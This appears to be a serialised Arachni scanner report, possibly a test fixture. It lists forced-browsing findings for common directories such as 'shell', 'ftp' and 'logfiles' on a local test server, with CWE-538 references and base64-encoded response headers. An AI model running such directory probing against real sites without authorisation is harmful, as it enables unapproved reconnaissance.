!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/wp-content/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/wp-content/
injected: wp-content
id: wp-content
elem: path
remarks: {}
method: ''
response: wp-content
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/demo/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/demo/
injected: demo
id: demo
elem: path
remarks: {}
method: ''
response: demo
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/ftp/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/ftp/
injected: ftp
id: ftp
elem: path
remarks: {}
method: ''
response: ftp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/member/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/member/
injected: member
id: member
elem: path
remarks: {}
method: ''
response: member
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/common/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/common/
injected: common
id: common
elem: path
remarks: {}
method: ''
response: common
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/shell/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/shell/
injected: shell
id: shell
elem: path
remarks: {}
method: ''
response: shell
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/readme/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/readme/
injected: readme
id: readme
elem: path
remarks: {}
method: ''
response: readme
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/main/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/main/
injected: main
id: main
elem: path
remarks: {}
method: ''
response: main
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/logfiles/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/logfiles/
injected: logfiles
id: logfiles
elem: path
remarks: {}
method: ''
response: logfiles
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/index/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/index/
injected: index
id: index
elem: path
remarks: {}
method: ''
response: index
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/members/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/members/
injected: members
id: members
elem: path
remarks: {}
method: ''
response: members
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/ibill/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/ibill/
injected: ibill
id: ibill
elem: path
remarks: {}
method: ''
response: ibill
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/samples/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/samples/
injected: samples
id: samples
elem: path
remarks: {}
method: ''
response: samples
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/incoming/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/incoming/
injected: incoming
id: incoming
elem: path
remarks: {}
method: ''
response: incoming
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/sample/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/sample/
injected: sample
id: sample
elem: path
remarks: {}
method: ''
response: sample
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
